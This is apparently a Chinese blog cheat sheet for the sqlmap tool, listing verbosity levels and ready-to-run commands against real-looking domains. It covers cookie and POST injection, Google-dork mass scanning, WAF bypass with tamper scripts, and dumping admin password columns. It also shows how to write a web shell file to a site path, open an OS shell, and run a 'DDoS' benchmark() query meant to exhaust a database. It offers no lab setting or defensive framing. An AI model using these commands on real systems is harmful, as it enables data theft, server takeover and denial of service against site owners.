一共有七个等级
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。

Mysql数据库注入
is-dba        当前用户权限
dbs            所有数据库
current-db        网站当前数据库
users            所有数据库用户
current-user    当前数据库用户
passwords         当前用户有权限读取包含用户密码的表的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解

Cookie注入
1.sqlmap -u "http://www.baidu.com/show.asp" --cookie "id=12" --level 2
2.sqlmap -u "http://www.baidu.com/show.asp" --tables --cookie "id=12" --level 2
3.sqlmap -u "http://www.baidu.com/show.asp" --columns -T "admin" --cookie "id=12" --level 2
4.sqlmap -u "http://www.baidu.com/show.asp" --dump -C "admin,password" -T "admin" --cookie "id=12" --level 2

Post注入
forms              自动获取post包
r            从本地获取结果post包
//注意看清提示键y,n,默认的键为大写
forms用法:
1.sqlmap -u "http://www.acyt.org/submit.php" --forms
2.sqlmap -u "http://www.acyt.org/submit.php" --forms --dbs
3.sqlmap -u "http://www.acyt.org/submit.php" --forms --tables -D "db"
参数r用法:
1.sqlmap -r post.txt
2.sqlmap -r post.txt --dbs
3.sqlmap -r post.txt --tables -D "db"
当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443

伪静态注入
例:http://www.acty.org/view/id/40.html
sqlmap -u "http://www.acty.org/view/id/40*.html" //注意*的位置

用谷歌批量扫注入
sqlmap -g "site:baidu.com inurl:php?id="

Temper插件过waf
sqlmap -u "http://www.acyt.org/news.php?id=34" --check-waf --tamper="插件" //检测是否有waf,会显示
1.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --batch --tamper="插件" //等级3以上才能检测
2.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --dbs --batch --tamper="插件"
3.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --tables -D "db" --batch --tamper="插件"
batch         要求不对目标写入   //可以不加,最好加
tamper        使用干预脚本
check        检查URL

File参数写文件
条件:
1.权限为dba权限
2.magic_quotes_gpc设置为off

file-write              从本地写入
file-dest            写入目标路径

语句:
sqlmap -u "http://www.acyt.org/news.php?id=34" --file-write=D:/1.php --file-dest=C:/input/www/test.php   //file-write是本机的文件,file-dest为网站绝对路径,注意斜杠

os参数
前提是要有dba权限,有dba权限不一定能使用
cmd            执行cmd命令(win)
shell            执行当前用户命令
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-cmd="whoami"
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-shell="whoami"
sqlmapDDoS攻击
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell
获得一个即时shell,执行
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

注入延时
sqlmap -u "http://www.acyt.org/news.php?id=34" --delay 0.5 //延时0.5秒
sqlmap -u "http://www.acyt.org/news.php?id=34" --dbs --delay 0.5
从Burp或者WebScarab代理中获取日志
sqlmap -l burp.log
sqlmap -l burp.log --dbs

执行sql语句
参数:--sql-query,--sql-shell
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell "sql语句"

暴力破解列名或表明
参数:--coomon-tables , --common-columns
sqlmap -u "http://www.acyt.org/news.php?id=34" --common-tables -D "db"
字典在txt文件夹下,可自定义

最新文章

  1. 项目安排(离散化+DP)
  2. iOS通过手势拿到当前的View
  3. Linux_RPM_查询
  4. SGU 422 Fast Typing(概率DP)
  5. 【问题与思考】1+"1"=?
  6. Notepad++中NppExec的使用之一:基本用法
  7. 实践JAVA wait(), notify(),sleep方法--一道多线程的面试题
  8. hdu 4781 Assignment For Princess (2013ACMICPC 成都站 A)
  9. 你认为A和B所在方格颜色相同吗?
  10. poj3709
  11. Codeforces Round #258 (Div. 2/B)/Codeforces451B_Sort the Array
  12. 3种方式实现可滑动的Tab
  13. 电子器件行业ERP实施案例
  14. Goland2019.1破解
  15. Java【初识篇】语言概述
  16. Python2基础
  17. Java POI 读取word文件
  18. IO的学习与使用
  19. springmvc常用注解标签详解(转载)
  20. MongDB安装使用

热门文章

  1. TF随笔-8
  2. Swift 保存pdf并在webview显示
  3. 余弦相似度及基于python的三种代码实现、与欧氏距离的区别
  4. U-Boot 不能识别FAT32 SD分区
  5. 类的初始化__init__使用
  6. C++面向对象的编程思想机器人
  7. canvas globalCompositeOperation
  8. CDQ分治--用时间降维的美丽算法
  9. 携程阿波罗(Apollo)配置中心
  10. 什么是Docker—无服务器计算服务